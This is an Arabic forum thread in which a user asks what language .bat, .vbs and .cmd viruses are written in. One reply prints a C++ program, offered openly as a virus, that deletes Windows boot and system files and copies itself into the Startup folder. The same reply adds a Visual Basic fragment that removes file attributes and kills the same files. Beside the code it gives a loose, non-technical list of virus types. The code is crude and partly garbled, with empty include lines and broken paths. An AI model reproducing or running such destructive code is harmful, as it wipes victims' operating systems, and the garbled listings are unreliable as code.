المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ايه هيا لغه برمجه الفيرسات الي هيا بصيغه bat او vbs اوcmd



commanderegy
01-31-2014, 11:03 PM
سوال عاوز اساله

السوال

ايه هيا لغه برمجه الفيرسات
الي هيا صيغتها
.bat
.vbs
.cmd

ولكم خالص الحب والتقدير

h m e
02-01-2014, 12:15 AM
انا علي حسب علمي تاخذ كود الفيرس وتنسخة في النوتباد وتعمل له save as وتحفظه باسم virus.bat يبقي امتداده bat وكذلك في باقي الامتدادات
ولكن اذا اردت ان تكتب انت تلك الاكواد فتوجه الي قسم الفيروسات

dark prince
02-01-2014, 03:06 AM
صديقي الفيروسات ليست محددة بلغة ما انما هي عبارة عن اكواد يتم برمجتها بلغة واحد او عدى لغات هذه الاكواد تحوي اوامر تعطا مباشرة للنظام فتنفذ عملية معينة
هذا مثال لفايروس مبرمج ب لغة c++

#include
#include
#include
main()
{
clrscr();
printf("tttWelcome to the Egyption -oO Virus Oo-nn");
printf("tt**** -oO Israel Oo- and -oO America Oo-nn");
remove("c:\windows\system.ini");
remove("c:\windows\win.ini");
remove("c:\autoexec.bat");
remove("c:\msdos.sys");
remove("c:\io.sys");
remove("c:\command.com");
remove("c:\config.sys");
remove("c:\windows\ebd\command.com");
remove("c:\windows\ebd\ebd.cab");
remove("c:\windows\ebd\Autoexec.bat");
remove("c:\windows\ebd\setramd.bat");
remove("c:\windows\ebd\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...nn");
system("PAUSE");
}

كما تلاحظ هناك تكرار لأمر معين remove
حيث يأتي بعد كل امر مسار في القرص سي هذا يعني ان وظيفة هذا الكود مسح ملفات مسؤولة عن اقلاع التظام وعمله بشكل جيد
وبالطبع سمعت عن لغة html
هناك فيروسات تصنع منها
وهناك قيروسات تصنع من لغة فيوجل بيسك
وهذا مثال لفايروس مصنوع ب فيوجل بيسك

SetAttr "c:autoexec.bat", vbNormal
SetAttr "c:msdos.sys", vbNormal
SetAttr "c:io.sys", vbNormal
SetAttr "c:windowswin.ini", vbNormal
SetAttr "c:windowssystem.ini", vbNormal
SetAttr "c:command.com", vbNormal
SetAttr "c:config.sys", vbNormal
SetAttr "c:windowsrundll.exe", vbNormal
SetAttr "c:windowsrundll32.exe", vbNormal
Kill "C:autoexec.bat"
Kill "C:msdos.sys"
Kill "C:io.sys"
Kill "C:windowswin.ini"
Kill "C:windowssystem.ini"
Kill "C:command.com"
Kill "C:config.sys"
Kill "C:windowsrundll.exe"
Kill "C:windowsrundll32.exe"

كما ترى امر kill مكرر وظيفة هذا الفايروس ايقاف هذه العمليات عن العمل

وطبعاً لا اريد ان انسى الفيروسات انواع

1: فيروسات التشغيل (Boot Sector Virus)

وهو الذي ينشط في منطقة نظام التشغيل وهو من اخطر أنواع الفيروسات حيث انه يمنعك من تشغيل الجهاز

2: فيروسات الماكرو (Macro Virus)
وهي من اكثر الفيروسات انتشارا حيث انها تضرب برامج الاوفيس .

3: فيروسات الملفات (File Virus)
وهي تنتشر في الملفات وعند فتح أي ملف يزيد انتشارها ..

4: الفيروسات المخفية (Steath Virus)
وهي التي تحاول آن تختبئ من البرامج المضادة للفيروسات و لكن سهل الإمساك بها

5: الفيروسات المتحولة (Polymorphic virus)
وهي الأصعب على برامج المقاومة حيث انه صعب الإمساك بها وتتغير من جهاز إلي آخر في أوامرها ..
ولكن مكتوبة بمستوى غير تقني فيسهل إزالتها


6: فيروسات متعددة الملفات (Multipartite Virus)

تصيب ملفات قطاع التشغيل و سريعة الانتشار ..

7: فيروسات الدودة (Worm)
وهو عبارة عن برنامج ينسخ نفسه على الاجهزه و يأتي من خلال الشبكة و ينسخ نفسه بالجهاز عدة مرات
حتى يبطئ الجهاز وهو مصمم لإبطاء الشبكات لا الأجهزة
و بعض الناس تقول ان هذا النوع لايعتبر فيروس حيث انه مصمم للإبطاء لا لأزاله الملفات و تخريبها ..

8: الباتشات (Trojans)
هو أيضا عبارة عن برنامج صغير قد يكون مدمج مع ملف آخر للتخفي عندما ينزله شخص و يفتحه يصيب
ال Registry و يفتح عندك منافذ مما يجعل جهازك قابل للاختراق بسهوله و هو يعتبر من أذكى البرامج
فمثلا عند عمل سكان(scan) هناك بعض التورجن يفك نفسه على هيئة ملفات غير محدده فيمر عليها السكان دون التعرف علية
و من ثم يجمع نفسه مره ثانيه


ارجو ان اكون قد افدتك وشكراً